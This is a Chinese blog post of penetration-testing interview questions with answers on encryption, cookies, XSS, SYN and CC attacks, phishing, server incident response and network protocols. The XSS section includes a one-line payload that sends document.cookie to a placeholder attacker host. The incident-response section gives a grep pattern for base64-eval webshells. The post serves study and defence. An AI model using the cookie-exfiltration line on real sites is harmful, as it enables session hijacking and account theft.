当前位置: 首页 > news >正文

2025年渗透测试面试题总结-07(题目+回答)

安全领域各种资源,学习文档,以及工具分享、前沿信息分享、POC、EXP分享。不定期分享各种好玩的项目及好用的工具,欢迎关注。

目录

一、对称加密 vs 非对称加密

二、同源策略(Same-Origin Policy)

三、Cookie存储与访问

四、XSS盗取Cookie流程

五、XSS与登录凭证

六、XSS防御体系

七、SYN洪水攻击原理

八、网络钓鱼(Phishing)

九、CC攻击(Challenge Collapasar)

十、Web服务器入侵排查步骤

十一、DLL文件(动态链接库)

十二、HTTPS核心作用

十三、Web攻击防御速查

十四、协议分布层

十五、ARP协议工作原理

十六、RIP协议(路由信息协议)

十七、RARP(反向地址解析协议)

十八、OSPF协议(开放最短路径优先)

十九、TCP vs UDP核心区别

实用建议

一、对称加密和非对称加密二、什么是同源策略?三、cookie 存在哪里?可以打开吗?四、xss 如何盗取 cookie?五、xss 有 cookie 一定可以无用户名密码登录吗?六、xss 如何防御?七、SYN 攻击原理八、什么是网络钓鱼?九、什么是 CC 攻击?十、Web 服务器被入侵后,怎样进行排查?十一、dll 文件是什么意思,有什么用?十二、Https 的作用十三、防范常见的 Web 攻击十四、重要协议分布层十五、arp 协议的工作原理十六、rip 协议是什么?rip 的工作原理十七、什么是 RARP?工作原理十八、OSPF 协议?OSPF 的工作原理十九、TCP 与 UDP 区别总结

一、对称加密 vs 非对称加密

类型对称加密非对称加密
密钥机制单密钥(加密解密相同)公钥加密 + 私钥解密
速度快(适合大数据量)慢(CPU消耗高)
安全性依赖密钥保管私钥不泄露即安全
典型算法AES, DESRSA, ECC
应用场景HTTPS数据传输加密SSL握手、数字签名

二、同源策略(Same-Origin Policy)

  • 定义:浏览器限制不同源(协议+域名+端口相同)的脚本访问对方资源
  • 目的:防止恶意网站窃取用户数据(如Cookie)
  • 绕过机制
    • CORS(跨域资源共享):服务端设置Access-Control-Allow-Origin
    • JSONP:通过<script>标签加载跨域数据(仅限GET)

三、Cookie存储与访问

属性说明
存储位置浏览器本地(文件或数据库)
打开方式浏览器开发者工具 → Application → Cookies(可查看/编辑)
安全限制HttpOnly标记的Cookie禁止JS读取(防XSS盗取)
生命周期会话Cookie(关闭浏览器删除) / 持久Cookie(按Expires时间保留)

四、XSS盗取Cookie流程

mermaidsequenceDiagram attacker->>victim: 发送含恶意脚本的链接 victim->>server: 访问被攻击页面 server->>victim: 返回嵌入恶意脚本的HTML victim->>browser: 执行脚本(发送Cookie到攻击者服务器) attacker->>attacker_server: 接收Cookie数据 

关键代码document.cookie + new Image().src='http://hacker.com?cookie='+encodeURIComponent(document.cookie)


五、XSS与登录凭证

  • 有条件登录
    • ✅ 若Cookie含会话ID(如sessionid=xxx)且未设HttpOnly → 直接冒用身份
    • ❌ 若Cookie仅为用户偏好数据 → 无法登录
  • 限制
    • 会话ID需在有效期内
    • 目标网站未启用二次验证(如短信/OTP)

六、XSS防御体系

层级防御措施
输入过滤特殊字符转义(<&lt;)、白名单验证
输出编码根据上下文选择HTML/JS/URL编码(如<script>\u003cscript\u003e
CSP策略HTTP头设置Content-Security-Policy: script-src 'self'(禁止内联脚本)
Cookie安全标记HttpOnly + Secure(仅HTTPS传输)

七、SYN洪水攻击原理

  • 利用缺陷:TCP三次握手未完成时,服务端维护半连接队列(消耗资源)
  • 攻击步骤
    1. 伪造大量虚假IP发送SYN
    2. 服务端回复SYN-ACK并等待应答(队列占满)
    3. 正常用户无法建立连接
  • 防御方案
    • SYN Cookie技术(无状态验证)
    • 防火墙限制每秒SYN包数量

八、网络钓鱼(Phishing)

  • 手法:伪装可信机构(银行/支付平台),诱导用户提交敏感信息
  • 常见形式
    • 钓鱼邮件(含虚假登录链接)
    • 仿冒网站(域名如paypa1.com
    • 伪基站短信
  • 防御
    • 用户教育(识别域名、HTTPS锁标志)
    • 浏览器标记钓鱼网站(Safe Browsing API)

九、CC攻击(Challenge Collapasar)

  • 本质:针对应用层的DDoS攻击
  • 原理:模拟大量正常请求(如频繁刷新页面、API调用),耗尽服务器资源
  • 与DDoS区别
    CC攻击DDoS攻击
    应用层(HTTP)网络层(TCP/UDP洪水)
    消耗CPU/数据库消耗带宽/连接数
  • 防御
    • 人机验证(验证码)
    • 请求频率限制(IP/用户)

十、Web服务器入侵排查步骤

  1. 隔离服务器:断网防止横向渗透
  2. 备份日志
    • Web访问日志(Apache/Nginx)
    • 系统日志(/var/log/auth.log
  3. 查异常进程
    • netstat -tunlp(异常端口)
    • top(高CPU进程)
  4. 查后门文件
    • 查找近期修改文件:find / -mtime -2
    • 扫描Web目录:grep -r "eval(base64_decode" /var/www
  5. 漏洞修复:更新系统/应用补丁

十一、DLL文件(动态链接库)

  • 作用
    • 共享代码库(多个程序调用同一功能)
    • 模块化开发(如Windows系统kernel32.dll
  • 劫持风险:恶意DLL替换系统文件 → 程序加载时执行恶意代码
  • 防护
    • 签名验证(signtool verify
    • 设置DLL搜索路径白名单

十二、HTTPS核心作用

安全目标实现机制
数据保密性对称加密(如AES-256)
身份认证CA机构签发数字证书(验证服务器身份)
数据完整性MAC(消息认证码)或HMAC防篡改

十三、Web攻击防御速查

攻击类型防御方案
SQL注入参数化查询(PreparedStatement)、存储过程
CSRFAnti-CSRF Token、SameSite=Strict Cookie属性
文件上传限制扩展名(白名单)、重命名文件、存储到非Web目录
SSRF内网IP黑名单、请求目标域名白名单

十四、协议分布层

协议所属OSI层级典型应用
ARP数据链路层IP → MAC地址映射
RIP/OSPF网络层动态路由协议
TCP/UDP传输层端到端数据传输
HTTPS应用层安全HTTP通信

十五、ARP协议工作原理

  1. 查询:主机A广播ARP Request(目标IP → 问MAC)
  2. 响应:目标主机B单播ARP Reply(返回MAC)
  3. 缓存:主机A记录IP-MAC映射到ARP表(有效期分钟级)
  • 攻击风险:ARP欺骗(伪造MAC对应关系) → 中间人攻击
  • 防御:静态ARP绑定、网络设备ARP检测

十六、RIP协议(路由信息协议)

  • 类型:距离向量路由协议(基于跳数)
  • 工作原理
    1. 路由器每30秒广播路由表给邻居
    2. 跳数+1(最大15跳,16跳视为不可达)
    3. 路由收敛慢(需多次广播更新)
  • 适用场景:小型局域网(现多被OSPF替代)

十七、RARP(反向地址解析协议)

  • 作用:已知MAC地址 → 获取IP地址(无盘工作站场景)
  • 流程
    1. 客户端广播RARP Request(含自身MAC)
    2. RARP服务器响应RARP Reply(分配IP)
  • 替代协议:BOOTP、DHCP(功能更强大)

十八、OSPF协议(开放最短路径优先)

  • 类型:链路状态路由协议(基于Dijkstra算法)
  • 核心机制
    1. 洪泛法广播链路状态(LSA)
    2. 构建拓扑图 → 计算最短路径树
    3. 划分区域(Area 0为骨干)减少广播域
  • 优势:快速收敛、支持大规模网络

十九、TCP vs UDP核心区别

维度TCPUDP
连接方式面向连接(三次握手)无连接
可靠性有序、重传、流量控制尽力交付(可能丢包)
传输速度慢(头部20字节+握手延迟)快(头部8字节)
数据边界字节流(需处理粘包)数据报(保留边界)
应用场景文件传输、Web页面视频流、DNS查询、实时游戏

实用建议

  1. 协议分析:用Wireshark抓包观察TCP握手、ARP请求等流程
  2. 安全加固
    • Web服务器:定期更新补丁 + 最小化开放端口
    • 开发规范:禁用eval()、所有输入视为不可信
  3. 面试重点:深入理解HTTPS握手流程、XSS/CSRF防御方案、TCP可靠性机制

附:命令速查

  • 查看ARP缓存:arp -a
  • 检测开放端口:netstat -ano | findstr LISTENING
  • 验证证书链:openssl s_client -connect example.com:443 -showcerts
http://www.lryc.cn/news/614712.html

相关文章:

  • 【设计模式】访问者模式模式
  • Chrome DevTools Protocol 开启协议监视器
  • flutter开发(一)flutter命令行工具
  • SVM实战:从线性可分到高维映射再到实战演练
  • 【同余最短路】P2371 [国家集训队] 墨墨的等式|省选-
  • 在 Git 中,将本地分支的修改提交到主分支
  • 广东省省考备考(第七十天8.8)——言语、判断推理(强化训练)
  • ubuntu 22.04 使用yaml文件 修改静态ip
  • 开发板RK3568和stm32的异同:
  • Redis对象编码
  • 【Bellman-Ford】High Score
  • 荣耀秋招启动
  • Sum of Four Values(sorting and searching)
  • 两个函数 quantize() 和 dequantize() 可用于对不同的位数进行量化实验
  • 力扣-189.轮转数组
  • 优选算法 力扣 15. 三数之和 双指针降低时间复杂度 C++题解 每日一题
  • 深入解析 Seaborn:数据可视化的优雅利器
  • 自定义上传本地文件夹到七牛云
  • 虚拟机Ubuntu图形化界面root用户登录错误
  • 使用pybind11封装C++API
  • Shell、Python对比
  • 要写新项目了,运行老Django项目找找记忆先
  • C++中的继承:从基础到复杂
  • 飞算JavaAI深度解析:专为Java生态而生的智能引擎
  • 安全引导功能及ATF的启动过程(四)
  • 巧妙实现Ethercat转Profinet协议网关匹配光伏电站
  • 「ECG信号处理——(22)Pan-Tompkins Findpeak 阈值检测 差分阈值算法——三种R波检测算法对比分析」2025年8月8日
  • C语言编译流程讲解
  • 【Open3D】基础操作之三维数据结构的高效组织和管理
  • 内网穿透原理与部署实战指南:从理论到企业级应用